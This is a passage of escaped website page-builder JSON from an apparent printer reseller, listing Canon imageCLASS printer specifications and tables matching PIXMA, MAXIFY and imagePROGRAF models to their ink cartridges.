dpi<\\/li><li>Mobile Printing<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 43ppm<\\/li><li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li><li>FPOT: 6.2secs. (A4)<\\/li><li>Max. paper input capacity: Up to 2,300 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p><\\/div><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 38ppm<\\/li><li>Recommended monthly print volume: 750 - 4,000 pages<\\/li><li>FPOT: 5.5secs. (A4)<\\/li><li>Max. paper input capacity: Up to 900 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f4fce1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"45b0f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d249821\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cartridge Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2dd6823\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d81a183\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62697a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>imagePROGRAF PRO-500<\\/p><\\/td><td width=\\\"208\\\"><p>Maintenance Cartridge MC-20<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY iB4170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5070<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5370<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5470<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E3170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E410<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c78b87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"71e2027\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E4270<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E470<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E477<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E480<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E510<\\/p><\\/td><td width=\\\"208\\\"><p>CL-98 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-88 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560 \\/ E560R<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G2010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G4010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110 (with battery)<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP1300<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2770 \\/ iP2772<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2870S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"13e8990\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"70107ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP4200<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP7270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP8770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6870<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2570S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td 